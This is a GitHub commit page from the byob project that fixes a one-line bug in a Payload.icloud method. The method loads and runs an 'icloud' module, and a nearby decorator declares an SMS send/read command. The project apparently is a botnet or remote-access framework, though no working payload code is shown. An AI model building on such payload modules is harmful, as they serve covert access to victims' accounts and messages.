Skip to content

Commit

Permalink
Fixed bug in Payload.icloud function in core/payloads.py
Browse files Browse the repository at this point in the history
  • Loading branch information
malwaredllc committed Oct 18, 2018
1 parent 2269d31 commit 3346ec7
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion byob/core/payloads.py
Original file line number Diff line number Diff line change
Expand Up @@ -501,7 +501,7 @@ def icloud(self):
"""
if 'icloud' not in globals():
globals()['icloud'] = self.load('icloud')
self.load('icloud')
return globals()['icloud'].run()

@config(platforms=['win32','linux2','darwin'], command=True, usage='sms <send/read> [args]')
Expand Down

0 comments on commit 3346ec7

Please sign in to comment.